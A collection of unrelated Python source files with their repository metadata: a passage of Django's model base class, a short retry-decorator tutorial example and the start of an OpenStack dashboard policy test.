When accessing deferred fields of an instance, the deferred loading
of the field will call this method.
"""
if fields is not None:
if len(fields) == 0:
return
if any(LOOKUP_SEP in f for f in fields):
raise ValueError(
'Found "%s" in fields argument. Relations and transforms '
'are not allowed in fields.' % LOOKUP_SEP)
db = using if using is not None else self._state.db
db_instance_qs = self.__class__._default_manager.using(db).filter(pk=self.pk)
# Use provided fields, if not set then reload all non-deferred fields.
deferred_fields = self.get_deferred_fields()
if fields is not None:
fields = list(fields)
db_instance_qs = db_instance_qs.only(*fields)
elif deferred_fields:
fields = [f.attname for f in self._meta.concrete_fields
if f.attname not in deferred_fields]
db_instance_qs = db_instance_qs.only(*fields)
db_instance = db_instance_qs.get()
non_loaded_fields = db_instance.get_deferred_fields()
for field in self._meta.concrete_fields:
if field.attname in non_loaded_fields:
# This field wasn't refreshed - skip ahead.
continue
setattr(self, field.attname, getattr(db_instance, field.attname))
# Throw away stale foreign key references.
if field.is_relation and field.get_cache_name() in self.__dict__:
rel_instance = getattr(self, field.get_cache_name())
local_val = getattr(db_instance, field.attname)
related_val = None if rel_instance is None else getattr(rel_instance, field.target_field.attname)
if local_val != related_val or (local_val is None and related_val is None):
del self.__dict__[field.get_cache_name()]
self._state.db = db_instance._state.db
def serializable_value(self, field_name):
"""
Return the value of the field name for this instance. If the field is
a foreign key, return the id value instead of the object. If there's
no Field object with this name on the model, return the model
attribute's value.
Used to serialize a field's value (in the serializer, or form output,
for example). Normally, you would just access the attribute directly
and not use this method.
"""
try:
field = self._meta.get_field(field_name)
except FieldDoesNotExist:
return getattr(self, field_name)
return getattr(self, field.attname)
def save(self, force_insert=False, force_update=False, using=None,
update_fields=None):
"""
Save the current instance. Override this in a subclass if you want to
control the saving process.
The 'force_insert' and 'force_update' parameters can be used to insist
that the "save" must be an SQL insert or update (or equivalent for
non-SQL backends), respectively. Normally, they should not be set.
"""
# Ensure that a model instance without a PK hasn't been assigned to
# a ForeignKey or OneToOneField on this model. If the field is
# nullable, allowing the save() would result in silent data loss.
for field in self._meta.concrete_fields:
if field.is_relation:
# If the related field isn't cached, then an instance hasn't
# been assigned and there's no need to worry about this check.
try:
getattr(self, field.get_cache_name())
except AttributeError:
continue
obj = getattr(self, field.name, None)
# A pk may have been assigned manually to a model instance not
# saved to the database (or auto-generated in a case like
# UUIDField), but we allow the save to proceed and rely on the
# database to raise an IntegrityError if applicable. If
# constraints aren't supported by the database, there's the
# unavoidable risk of data corruption.
if obj and obj.pk is None:
# Remove the object from a related instance cache.
if not field.remote_field.multiple:
delattr(obj, field.remote_field.get_cache_name())
raise ValueError(
"save() prohibited to prevent data loss due to "
"unsaved related object '%s'." % field.name
)
using = using or router.db_for_write(self.__class__, instance=self)
if force_insert and (force_update or update_fields):
raise ValueError("Cannot force both insert and updating in model saving.")
deferred_fields = self.get_deferred_fields()
if update_fields is not None:
# If update_fields is empty, skip the save. We do also check for
# no-op saves later on for inheritance cases. This bailout is
# still needed for skipping signal sending.
if len(update_fields) == 0:
return
update_fields = frozenset(update_fields)
field_names = set()
for field in self._meta.fields:
if not field.primary_key:
field_names.add(field.name)
if field.name != field.attname:
field_names.add(field.attname)
non_model_fields = update_fields.difference(field_names)
if non_model_fields:
raise ValueError("The following fields do not exist in this "
"model or are m2m fields: %s"
% ', '.join(non_model_fields))
# If saving to the same database, and this model is deferred, then
# automatically do a "update_fields" save on the loaded fields.
elif not force_insert and deferred_fields and using == self._state.db:
field_names = set()
for field in self._meta.concrete_fields:
if not field.primary_key and not hasattr(field, 'through'):
field_names.add(field.attname)
loaded_fields = field_names.difference(deferred_fields)
if loaded_fields:
update_fields = frozenset(loaded_fields)
self.save_base(using=using, force_insert=force_insert,
force_update=force_update, update_fields=update_fields)
save.alters_data = True
def save_base(self, raw=False, force_insert=False,
force_update=False, using=None, update_fields=None):
"""
Handle the parts of saving which should be done only once per save,
yet need to be done in raw saves, too. This includes some sanity
checks and signal sending.
The 'raw' argument is telling save_base not to save any parent
models and not to do any changes to the values before save. This
is used by fixture loading.
"""
using = using or router.db_for_write(self.__class__, instance=self)
assert not (force_insert and (force_update or update_fields))
assert update_fields is None or len(update_fields) > 0
cls = origin = self.__class__
# Skip proxies, but keep the origin as the proxy model.
if cls._meta.proxy:
cls = cls._meta.concrete_model
meta = cls._meta
if not meta.auto_created:
pre_save.send(
sender=origin, instance=self, raw=raw, using=using,
update_fields=update_fields,
)
with transaction.atomic(using=using, savepoint=False):
if not raw:
self._save_parents(cls, using, update_fields)
updated = self._save_table(raw, cls, force_insert, force_update, using, update_fields)
# Store the database on which the object was saved
self._state.db = using
# Once saved, this is no longer a to-be-added instance.
self._state.adding = False
# Signal that the save is complete
if not meta.auto_created:
post_save.send(
sender=origin, instance=self, created=(not updated),
update_fields=update_fields, raw=raw, using=using,
)
save_base.alters_data = True
def _save_parents(self, cls, using, update_fields):
"""Save all the parents of cls using values from self."""
meta = cls._meta
for parent, field in meta.parents.items():
# Make sure the link fields are synced between parent and self.
if (field and getattr(self, parent._meta.pk.attname) is None and
getattr(self, field.attname) is not None):
setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
self._save_parents(cls=parent, using=using, update_fields=update_fields)
self._save_table(cls=parent, using=using, update_fields=update_fields)
# Set the parent's PK value to self.
if field:
setattr(self, field.attname, self._get_pk_val(parent._meta))
# Since we didn't have an instance of the parent handy set
# attname directly, bypassing the descriptor. Invalidate
# the related object cache, in case it's been accidentally
# populated. A fresh instance will be re-built from the
# database if necessary.
cache_name = field.get_cache_name()
if hasattr(self, cache_name):
delattr(self, cache_name)
def _save_table(self, raw=False, cls=None, force_insert=False,
force_update=False, using=None, update_fields=None):
"""
Do the heavy-lifting involved in saving. Update or insert the data
for a single table.
"""
meta = cls._meta
non_pks = [f for f in meta.local_concrete_fields if not f.primary_key]
if update_fields:
non_pks = [f for f in non_pks
if f.name in update_fields or f.attname in update_fields]
pk_val = self._get_pk_val(meta)
if pk_val is None:
pk_val = meta.pk.get_pk_value_on_save(self)
setattr(self, meta.pk.attname, pk_val)
pk_set = pk_val is not None
if not pk_set and (force_update or update_fields):
raise ValueError("Cannot force an update in save() with no primary key.")
updated = False
# If possible, try an UPDATE. If that doesn't update anything, do an INSERT.
if pk_set and not force_insert:
base_qs = cls._base_manager.using(using)
values = [(f, None, (getattr(self, f.attname) if raw else f.pre_save(self, False)))
for f in non_pks]
forced_update = update_fields or force_update
updated = self._do_update(base_qs, using, pk_val, values, update_fields,
forced_update)
if force_update and not updated:
raise DatabaseError("Forced update did not affect any rows.")
if update_fields and not updated:
raise DatabaseError("Save with update_fields did not affect any rows.")
if not updated:
if meta.order_with_respect_to:
# If this is a model with an order_with_respect_to
# autopopulate the _order field
field = meta.order_with_respect_to
filter_args = field.get_filter_kwargs_for_object(self)
order_value = cls._base_manager.using(using).filter(**filter_args).count()
self._order = order_value
fields = meta.local_concrete_fields
if not pk_set:
fields = [f for f in fields if f is not meta.auto_field]
update_pk = meta.auto_field and not pk_set
result = self._do_insert(cls._base_manager, using, fields, update_pk, raw)
if update_pk:
setattr(self, meta.pk.attname, result)
return updated
def _do_update(self, base_qs, using, pk_val, values, update_fields, forced_update):
"""
Try to update the model. Return True if the model was updated (if an
update query was done and a matching row was found in the DB).
"""
filtered = base_qs.filter(pk=pk_val)
if not values:
# We can end up here when saving a model in inheritance chain where
# update_fields doesn't target any field in current model. In that
# case we just say the update succeeded. Another case ending up here
# is a model with just PK - in that case check that the PK still
# exists.
return update_fields is not None or filtered.exists()
if self._meta.select_on_save and not forced_update:
if filtered.exists():
# It may happen that the object is deleted from the DB right after
# this check, causing the subsequent UPDATE to return zero matching
# rows. The same result can occur in some rare cases when the
# database returns zero despite the UPDATE being executed
# successfully (a row is matched and updated). In order to
# distinguish these two cases, the object's existence in the
# database is again checked for if the UPDATE query returns 0.
return filtered._update(values) > 0 or filtered.exists()
else:
return False
return filtered._update(values) > 0
def _do_insert(self, manager, using, fields, update_pk, raw):
"""
Do an INSERT. If update_pk is defined then this method should return
the new pk for the model.
"""
return manager._insert([self], fields=fields, return_id=update_pk,
using=using, raw=raw)
def delete(self, using=None, keep_parents=False):
using = using or router.db_for_write(self.__class__, instance=self)
assert self._get_pk_val() is not None, (
"%s object can't be deleted because its %s attribute is set to None." %
(self._meta.object_name, self._meta.pk.attname)
)
collector = Collector(using=using)
collector.collect([self], keep_parents=keep_parents)
return collector.delete()
delete.alters_data = True
def _get_FIELD_display(self, field):
value = getattr(self, field.attname)
return force_text(dict(field.flatchoices).get(value, value), strings_only=True)
def _get_next_or_previous_by_FIELD(self, field, is_next, **kwargs):
if not self.pk:
raise ValueError("get_next/get_previous cannot be used on unsaved objects.")
op = 'gt' if is_next else 'lt'
order = '' if is_next else '-'
param = force_text(getattr(self, field.attname))
q = Q(**{'%s__%s' % (field.name, op): param})
q = q | Q(**{field.name: param, 'pk__%s' % op: self.pk})
qs = self.__class__._default_manager.using(self._state.db).filter(**kwargs).filter(q).order_by(
'%s%s' % (order, field.name), '%spk' % order
)
try:
return qs[0]
except IndexError:
raise self.DoesNotExist("%s matching query does not exist." % self.__class__._meta.object_name)
def _get_next_or_previous_in_order(self, is_next):
cachename = "__%s_order_cache" % is_next
if not hasattr(self, cachename):
op = 'gt' if is_next else 'lt'
order = '_order' if is_next else '-_order'
order_field = self._meta.order_with_respect_to
filter_args = order_field.get_filter_kwargs_for_object(self)
obj = self.__class__._default_manager.filter(**filter_args).filter(**{
'_order__%s' % op: self.__class__._default_manager.values('_order').filter(**{
self._meta.pk.name: self.pk
})
}).order_by(order)[:1].get()
setattr(self, cachename, obj)
return getattr(self, cachename)
def prepare_database_save(self, field):
if self.pk is None:
raise ValueError("Unsaved model instance %r cannot be used in an ORM query." % self)
return getattr(self, field.remote_field.get_related_field().attname)
def clean(self):
"""
Hook for doing any extra model-wide validation after clean() has been
called on every field by self.clean_fields. Any ValidationError raised
by this method will not be associated with a particular field; it will
have a special-case association with the field defined by NON_FIELD_ERRORS.
"""
pass
def validate_unique(self, exclude=None):
"""
Check unique constraints on the model and raise ValidationError if any
failed.
"""
unique_checks, date_checks = self._get_unique_checks(exclude=exclude)
errors = self._perform_unique_checks(unique_checks)
date_errors = self._perform_date_checks(date_checks)
for k, v in date_errors.items():
errors.setdefault(k, []).extend(v)
if errors:
raise ValidationError(errors)
def _get_unique_checks(self, exclude=None):
"""
Return a list of checks to perform. Since validate_unique() could be
called from a ModelForm, some fields may have been excluded; we can't
perform a unique check on a model that is missing fields involved
in that check. Fields that did not validate should also be excluded,
but they need to be passed in via the exclude argument.
"""
if exclude is None:
exclude = []
unique_checks = []
unique_togethers = [(self.__class__, self._meta.unique_together)]
for parent_class in self._meta.get_parent_list():
if parent_class._meta.unique_together:
unique_togethers.append((parent_class, parent_class._meta.unique_together))
for model_class, unique_together in unique_togethers:
for check in unique_together:
for name in check:
# If this is an excluded field, don't add this check.
if name in exclude:
break
else:
unique_checks.append((model_class, tuple(check)))
# These are checks for the unique_for_<date/year/month>.
date_checks = []
# Gather a list of checks for fields declared as unique and add them to
# the list of checks.
fields_with_class = [(self.__class__, self._meta.local_fields)]
for parent_class in self._meta.get_parent_list():
fields_with_class.append((parent_class, parent_class._meta.local_fields))
for model_class, fields in fields_with_class:
for f in fields:
name = f.name
if name in exclude:
continue
if f.unique:
unique_checks.append((model_class, (name,)))
if f.unique_for_date and f.unique_for_date not in exclude:
date_checks.append((model_class, 'date', name, f.unique_for_date))
if f.unique_for_year and f.unique_for_year not in exclude:
date_checks.append((model_class, 'year', name, f.unique_for_year))
if f.unique_for_month and f.unique_for_month not in exclude:
date_checks.append((model_class, 'month', name, f.unique_for_month))
return unique_checks, date_checks
def _perform_unique_checks(self, unique_checks):
errors = {}
for model_class, unique_check in unique_checks:
# Try to look up an existing object with the same values as this
# object's values for all the unique field.
lookup_kwargs = {}
for field_name in unique_check:
f = self._meta.get_field(field_name)
lookup_value = getattr(self, f.attname)
# TODO: Handle multiple backends with different feature flags.
if (lookup_value is None or
(lookup_value == '' and connection.features.interprets_empty_strings_as_nulls)):
# no value, skip the lookup
continue
if f.primary_key and not self._state.adding:
# no need to check for unique primary key when editing
continue
lookup_kwargs[str(field_name)] = lookup_value
# some fields were skipped, no reason to do the check
if len(unique_check) != len(lookup_kwargs):
continue
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
# Note that we need to use the pk as defined by model_class, not
# self.pk. These can be different fields because model inheritance
# allows single model to have effectively multiple primary keys.
# Refs #17615.
model_class_pk = self._get_pk_val(model_class._meta)
if not self._state.adding and model_class_pk is not None:
qs = qs.exclude(pk=model_class_pk)
if qs.exists():
if len(unique_check) == 1:
key = unique_check[0]
else:
key = NON_FIELD_ERRORS
errors.setdefault(key, []).append(self.unique_error_message(model_class, unique_check))
return errors
def _perform_date_checks(self, date_checks):
errors = {}
for model_class, lookup_type, field, unique_for in date_checks:
lookup_kwargs = {}
# there's a ticket to add a date lookup, we can remove this special
# case if that makes it's way in
date = getattr(self, unique_for)
if date is None:
continue
if lookup_type == 'date':
lookup_kwargs['%s__day' % unique_for] = date.day
lookup_kwargs['%s__month' % unique_for] = date.month
lookup_kwargs['%s__year' % unique_for] = date.year
else:
lookup_kwargs['%s__%s' % (unique_for, lookup_type)] = getattr(date, lookup_type)
lookup_kwargs[field] = getattr(self, field)
qs = model_class._default_manager.filter(**lookup_kwargs)
# Exclude the current object from the query if we are editing an
# instance (as opposed to creating a new one)
if not self._state.adding and self.pk is not None:
qs = qs.exclude(pk=self.pk)
if qs.exists():
errors.setdefault(field, []).append(
self.date_error_message(lookup_type, field, unique_for)
)
return errors
def date_error_message(self, lookup_type, field_name, unique_for):
opts = self._meta
field = opts.get_field(field_name)
return ValidationError(
message=field.error_messages['unique_for_date'],
code='unique_for_date',
params={
'model': self,
'model_name': capfirst(opts.verbose_name),
'lookup_type': lookup_type,
'field': field_name,
'field_label': capfirst(field.verbose_name),
'date_field': unique_for,
'date_field_label': capfirst(opts.get_field(unique_for).verbose_name),
}
)
def unique_error_message(self, model_class, unique_check):
opts = model_class._meta
params = {
'model': self,
'model_class': model_class,
'model_name': capfirst(opts.verbose_name),
'unique_check': unique_check,
}
# A unique field
if len(unique_check) == 1:
field = opts.get_field(unique_check[0])
params['field_label'] = capfirst(field.verbose_name)
return ValidationError(
message=field.error_messages['unique'],
code='unique',
params=params,
)
# unique_together
else:
field_labels = [capfirst(opts.get_field(f).verbose_name) for f in unique_check]
params['field_labels'] = get_text_list(field_labels, _('and'))
return ValidationError(
message=_("%(model_name)s with this %(field_labels)s already exists."),
code='unique_together',
params=params,
)
def full_clean(self, exclude=None, validate_unique=True):
"""
Call clean_fields(), clean(), and validate_unique() on the model.
Raise a ValidationError for any errors that occur.
"""
errors = {}
if exclude is None:
exclude = []
else:
exclude = list(exclude)
try:
self.clean_fields(exclude=exclude)
except ValidationError as e:
errors = e.update_error_dict(errors)
# Form.clean() is run even if other validation fails, so do the
# same with Model.clean() for consistency.
try:
self.clean()
except ValidationError as e:
errors = e.update_error_dict(errors)
# Run unique checks, but only for fields that passed validation.
if validate_unique:
for name in errors.keys():
if name != NON_FIELD_ERRORS and name not in exclude:
exclude.append(name)
try:
self.validate_unique(exclude=exclude)
except ValidationError as e:
errors = e.update_error_dict(errors)
if errors:
raise ValidationError(errors)
def clean_fields(self, exclude=None):
"""
Clean all fields and raise a ValidationError containing a dict
of all validation errors if any occur.
"""
if exclude is None:
exclude = []
errors = {}
for f in self._meta.fields:
if f.name in exclude:
continue
# Skip validation for empty fields with blank=True. The developer
# is responsible for making sure they have a valid value.
raw_value = getattr(self, f.attname)
if f.blank and raw_value in f.empty_values:
continue
try:
setattr(self, f.attname, f.clean(raw_value, self))
except ValidationError as e:
errors[f.name] = e.error_list
if errors:
raise ValidationError(errors)
@classmethod
def check(cls, **kwargs):
errors = []
errors.extend(cls._check_swappable())
errors.extend(cls._check_model())
errors.extend(cls._check_managers(**kwargs))
if not cls._meta.swapped:
errors.extend(cls._check_fields(**kwargs))
errors.extend(cls._check_m2m_through_same_relationship())
errors.extend(cls._check_long_column_names())
clash_errors = (
cls._check_id_field() +
cls._check_field_name_clashes() +
cls._check_model_name_db_lookup_clashes()
)
errors.extend(clash_errors)
# If there are field name clashes, hide consequent column name
# clashes.
if not clash_errors:
errors.extend(cls._check_column_name_clashes())
errors.extend(cls._check_index_together())
errors.extend(cls._check_unique_together())
errors.extend(cls._check_ordering())
return errors
@classmethod
def _check_swappable(cls):
"""Check if the swapped model exists."""
errors = []
if cls._meta.swapped:
try:
apps.get_model(cls._meta.swapped)
except ValueError:
errors.append(
checks.Error(
"'%s' is not of the form 'app_label.app_name'." % cls._meta.swappable,
id='models.E001',
)
)
except LookupError:
app_label, model_name = cls._meta.swapped.split('.')
errors.append(
checks.Error(
"'%s' references '%s.%s', which has not been "
"installed, or is abstract." % (
cls._meta.swappable, app_label, model_name
),
id='models.E002',
)
)
return errors
@classmethod
def _check_model(cls):
errors = []
if cls._meta.proxy:
if cls._meta.local_fields or cls._meta.local_many_to_many:
errors.append(
checks.Error(
"Proxy model '%s' contains model fields." % cls.__name__,
id='models.E017',
)
)
return errors
@classmethod
def _check_managers(cls, **kwargs):
"""Perform all manager checks."""
errors = []
for manager in cls._meta.managers:
errors.extend(manager.check(**kwargs))
return errors
@classmethod
def _check_fields(cls, **kwargs):
"""Perform all field checks."""
errors = []
for field in cls._meta.local_fields:
errors.extend(field.check(**kwargs))
for field in cls._meta.local_many_to_many:
errors.extend(field.check(from_model=cls, **kwargs))
return errors
@classmethod
def _check_m2m_through_same_relationship(cls):
""" Check if no relationship model is used by more than one m2m field.
"""
errors = []
seen_intermediary_signatures = []
fields = cls._meta.local_many_to_many
# Skip when the target model wasn't found.
fields = (f for f in fields if isinstance(f.remote_field.model, ModelBase))
# Skip when the relationship model wasn't found.
fields = (f for f in fields if isinstance(f.remote_field.through, ModelBase))
for f in fields:
signature = (f.remote_field.model, cls, f.remote_field.through)
if signature in seen_intermediary_signatures:
errors.append(
checks.Error(
"The model has two many-to-many relations through "
"the intermediate model '%s'." % f.remote_field.through._meta.label,
obj=cls,
id='models.E003',
)
)
else:
seen_intermediary_signatures.append(signature)
return errors
@classmethod
def _check_id_field(cls):
"""Check if `id` field is a primary key."""
fields = list(f for f in cls._meta.local_fields if f.name == 'id' and f != cls._meta.pk)
# fields is empty or consists of the invalid "id" field
if fields and not fields[0].primary_key and cls._meta.pk.name == 'id':
return [
checks.Error(
"'id' can only be used as a field name if the field also "
"sets 'primary_key=True'.",
obj=cls,
id='models.E004',
)
]
else:
return []
@classmethod
def _check_field_name_clashes(cls):
"""Forbid field shadowing in multi-table inheritance."""
errors = []
used_fields = {} # name or attname -> field
# Check that multi-inheritance doesn't cause field name shadowing.
for parent in cls._meta.get_parent_list():
for f in parent._meta.local_fields:
clash = used_fields.get(f.name) or used_fields.get(f.attname) or None
if clash:
errors.append(
checks.Error(
"The field '%s' from parent model "
"'%s' clashes with the field '%s' "
"from parent model '%s'." % (
clash.name, clash.model._meta,
f.name, f.model._meta
),
obj=cls,
id='models.E005',
)
)
used_fields[f.name] = f
used_fields[f.attname] = f
# Check that fields defined in the model don't clash with fields from
# parents, including auto-generated fields like multi-table inheritance
# child accessors.
for parent in cls._meta.get_parent_list():
for f in parent._meta.get_fields():
if f not in used_fields:
used_fields[f.name] = f
for f in cls._meta.local_fields:
clash = used_fields.get(f.name) or used_fields.get(f.attname) or None
# Note that we may detect clash between user-defined non-unique
# field "id" and automatically added unique field "id", both
# defined at the same model. This special case is considered in
# _check_id_field and here we ignore it.
id_conflict = f.name == "id" and clash and clash.name == "id" and clash.model == cls
if clash and not id_conflict:
errors.append(
checks.Error(
"The field '%s' clashes with the field '%s' "
"from model '%s'." % (
f.name, clash.name, clash.model._meta
),
obj=f,
id='models.E006',
)
)
used_fields[f.name] = f
used_fields[f.attname] = f
return errors
@classmethod
def _check_column_name_clashes(cls):
# Store a list of column names which have already been used by other fields.
used_column_names = []
errors = []
for f in cls._meta.local_fields:
_, column_name = f.get_attname_column()
# Ensure the column name is not already in use.
if column_name and column_name in used_column_names:
errors.append(
checks.Error(
"Field '%s' has column name '%s' that is used by "
"another field." % (f.name, column_name),
hint="Specify a 'db_column' for the field.",
obj=cls,
id='models.E007'
)
)
else:
used_column_names.append(column_name)
return errors
@classmethod
def _check_model_name_db_lookup_clashes(cls):
errors = []
model_name = cls.__name__
if model_name.startswith('_') or model_name.endswith('_'):
errors.append(
checks.Error(
"The model name '%s' cannot start or end with an underscore "
"as it collides with the query lookup syntax." % model_name,
obj=cls,
id='models.E023'
)
)
elif LOOKUP_SEP in model_name:
errors.append(
checks.Error(
"The model name '%s' cannot contain double underscores as "
"it collides with the query lookup syntax." % model_name,
obj=cls,
id='models.E024'
)
)
return errors
@classmethod
def _check_index_together(cls):
"""Check the value of "index_together" option."""
if not isinstance(cls._meta.index_together, (tuple, list)):
return [
checks.Error(
"'index_together' must be a list or tuple.",
obj=cls,
id='models.E008',
)
]
elif any(not isinstance(fields, (tuple, list)) for fields in cls._meta.index_together):
return [
checks.Error(
"All 'index_together' elements must be lists or tuples.",
obj=cls,
id='models.E009',
)
]
else:
errors = []
for fields in cls._meta.index_together:
errors.extend(cls._check_local_fields(fields, "index_together"))
return errors
@classmethod
def _check_unique_together(cls):
"""Check the value of "unique_together" option."""
if not isinstance(cls._meta.unique_together, (tuple, list)):
return [
checks.Error(
"'unique_together' must be a list or tuple.",
obj=cls,
id='models.E010',
)
]
elif any(not isinstance(fields, (tuple, list)) for fields in cls._meta.unique_together):
return [
checks.Error(
"All 'unique_together' elements must be lists or tuples.",
obj=cls,
id='models.E011',
)
]
else:
errors = []
for fields in cls._meta.unique_together:
errors.extend(cls._check_local_fields(fields, "unique_together"))
return errors
@classmethod
def _check_local_fields(cls, fields, option):
from django.db import models
# In order to avoid hitting the relation tree prematurely, we use our
# own fields_map instead of using get_field()
forward_fields_map = {
field.name: field for field in cls._meta._get_fields(reverse=False)
}
errors = []
for field_name in fields:
try:
field = forward_fields_map[field_name]
except KeyError:
errors.append(
checks.Error(
"'%s' refers to the nonexistent field '%s'." % (
option, field_name,
),
obj=cls,
id='models.E012',
)
)
else:
if isinstance(field.remote_field, models.ManyToManyRel):
errors.append(
checks.Error(
"'%s' refers to a ManyToManyField '%s', but "
"ManyToManyFields are not permitted in '%s'." % (
option, field_name, option,
),
obj=cls,
id='models.E013',
)
)
elif field not in cls._meta.local_fields:
errors.append(
checks.Error(
"'%s' refers to field '%s' which is not local to model '%s'."
% (option, field_name, cls._meta.object_name),
hint="This issue may be caused by multi-table inheritance.",
obj=cls,
id='models.E016',
)
)
return errors
@classmethod
def _check_ordering(cls):
"""
Check "ordering" option -- is it a list of strings and do all fields
exist?
"""
if cls._meta._ordering_clash:
return [
checks.Error(
"'ordering' and 'order_with_respect_to' cannot be used together.",
obj=cls,
id='models.E021',
),
]
if cls._meta.order_with_respect_to or not cls._meta.ordering:
return []
if not isinstance(cls._meta.ordering, (list, tuple)):
return [
checks.Error(
"'ordering' must be a tuple or list (even if you want to order by only one field).",
obj=cls,
id='models.E014',
)
]
errors = []
fields = cls._meta.ordering
# Skip '?' fields.
fields = (f for f in fields if f != '?')
# Convert "-field" to "field".
fields = ((f[1:] if f.startswith('-') else f) for f in fields)
# Skip ordering in the format field1__field2 (FIXME: checking
# this format would be nice, but it's a little fiddly).
fields = (f for f in fields if LOOKUP_SEP not in f)
# Skip ordering on pk. This is always a valid order_by field
# but is an alias and therefore won't be found by opts.get_field.
fields = {f for f in fields if f != 'pk'}
# Check for invalid or nonexistent fields in ordering.
invalid_fields = []
# Any field name that is not present in field_names does not exist.
# Also, ordering by m2m fields is not allowed.
opts = cls._meta
valid_fields = set(chain.from_iterable(
(f.name, f.attname) if not (f.auto_created and not f.concrete) else (f.field.related_query_name(),)
for f in chain(opts.fields, opts.related_objects)
))
invalid_fields.extend(fields - valid_fields)
for invalid_field in invalid_fields:
errors.append(
checks.Error(
"'ordering' refers to the nonexistent field '%s'." % invalid_field,
obj=cls,
id='models.E015',
)
)
return errors
@classmethod
def _check_long_column_names(cls):
"""
Check that any auto-generated column names are shorter than the limits
for each database in which the model will be created.
"""
errors = []
allowed_len = None
db_alias = None
# Find the minimum max allowed length among all specified db_aliases.
for db in settings.DATABASES.keys():
# skip databases where the model won't be created
if not router.allow_migrate_model(db, cls):
continue
connection = connections[db]
max_name_length = connection.ops.max_name_length()
if max_name_length is None or connection.features.truncates_names:
continue
else:
if allowed_len is None:
allowed_len = max_name_length
db_alias = db
elif max_name_length < allowed_len:
allowed_len = max_name_length
db_alias = db
if allowed_len is None:
return errors
for f in cls._meta.local_fields:
_, column_name = f.get_attname_column()
# Check if auto-generated name for the field is too long
# for the database.
if f.db_column is None and column_name is not None and len(column_name) > allowed_len:
errors.append(
checks.Error(
'Autogenerated column name too long for field "%s". '
'Maximum length is "%s" for database "%s".'
% (column_name, allowed_len, db_alias),
hint="Set the column name manually using 'db_column'.",
obj=cls,
id='models.E018',
)
)
for f in cls._meta.local_many_to_many:
# Skip nonexistent models.
if isinstance(f.remote_field.through, str):
continue
# Check if auto-generated name for the M2M field is too long
# for the database.
for m2m in f.remote_field.through._meta.local_fields:
_, rel_name = m2m.get_attname_column()
if m2m.db_column is None and rel_name is not None and len(rel_name) > allowed_len:
errors.append(
checks.Error(
'Autogenerated column name too long for M2M field '
'"%s". Maximum length is "%s" for database "%s".'
% (rel_name, allowed_len, db_alias),
hint=(
"Use 'through' to create a separate model for "
"M2M and then set column_name using 'db_column'."
),
obj=cls,
id='models.E019',
)
)
return errors
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
order_wrt = ordered_obj._meta.order_with_respect_to
filter_args = order_wrt.get_forward_related_filter(self)
# FIXME: It would be nice if there was an "update many" version of update
# for situations like this.
with transaction.atomic(using=using, savepoint=False):
for i, j in enumerate(id_list):
ordered_obj.objects.filter(pk=j, **filter_args).update(_order=i)
def method_get_order(ordered_obj, self):
order_wrt = ordered_obj._meta.order_with_respect_to
filter_args = order_wrt.get_forward_related_filter(self)
pk_name = ordered_obj._meta.pk.name
return ordered_obj.objects.filter(**filter_args).values_list(pk_name, flat=True)
def make_foreign_order_accessors(model, related_model):
setattr(
related_model,
'get_%s_order' % model.__name__.lower(),
curry(method_get_order, model)
)
setattr(
related_model,
'set_%s_order' % model.__name__.lower(),
curry(method_set_order, model)
)
########
# MISC #
########
def model_unpickle(model_id):
"""Used to unpickle Model subclasses with deferred fields."""
if isinstance(model_id, tuple):
model = apps.get_model(*model_id)
else:
# Backwards compat - the model was cached directly in earlier versions.
model = model_id
return model.__new__(model)
model_unpickle.__safe_for_unpickle__ = True
def unpickle_inner_exception(klass, exception_name):
# Get the exception class from the class it is attached to:
exception = getattr(klass, exception_name)
return exception.__new__(exception)
|
{
"content_hash": "f672ebda4f5b03dc61c1950caa9431c5",
"timestamp": "",
"source": "github",
"line_count": 1716,
"max_line_length": 114,
"avg_line_length": 41.35489510489511,
"alnum_prop": 0.5386739942225041,
"repo_name": "camilonova/django",
"id": "efc8b1862f508becd37dac9ca671023ba6929ba8",
"size": "70965",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/db/models/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55935"
},
{
"name": "HTML",
"bytes": "182943"
},
{
"name": "JavaScript",
"bytes": "252645"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11830666"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
from time import sleep
from functools import wraps
import logging
logging.basicConfig()
log = logging.getLogger("retry")
def retry(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
MAX_ATTEMPTS = 5
for attempt in range(1, MAX_ATTEMPTS + 1):
try:
return f(*args, **kwargs)
except:
log.exception("Attempt %s/%s failed : %s",
attempt, MAX_ATTEMPTS, (args, kwargs))
sleep(10 * attempt)
log.critical("All %s attempts failed: %s",
MAX_ATTEMPTS, (args, kwargs))
return wrapped_f
counter = 0
@retry
def save_to_database(arg):
print("Write to a database or make a network call or etc.")
print("This will be automatically retried if exception is thrown.")
global counter
counter += 1
# This will throw an exception in the first call
# And will work fine in second call (i.e. a retry)
if counter < 2:
raise ValueError(arg)
if __name__ == '__main__':
save_to_database("Some bad value")
|
{
"content_hash": "e27709bfe28a215d93e3780534183d80",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 71,
"avg_line_length": 28.72972972972973,
"alnum_prop": 0.5888993414863594,
"repo_name": "pezy/python_test",
"id": "1e7080fc2fa841ec108a43fcfbb6e3cf51eab9cd",
"size": "1063",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "byteofpy/more_decorator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "21331"
}
],
"symlink_target": ""
}
|
from django.test.utils import override_settings
from openstack_auth import policy as policy_backend
from openstack_dashboard import policy
from openstack_dashboard.test import helpers as test
class PolicyBackendTestCase(test.TestCase):
def test_policy_file_load(self):
policy_backend.reset()
enforcer = policy_backend._get_enforcer()
self.assertEqual(2, len(enforcer))
self.assertTrue('identity' in enforcer)
self.assertTrue('compute' in enforcer)
def test_policy_reset(self):
policy_backend._get_enforcer()
self.assertEqual(2, len(policy_backend._ENFORCER))
policy_backend.reset()
self.assertIsNone(policy_backend._ENFORCER)
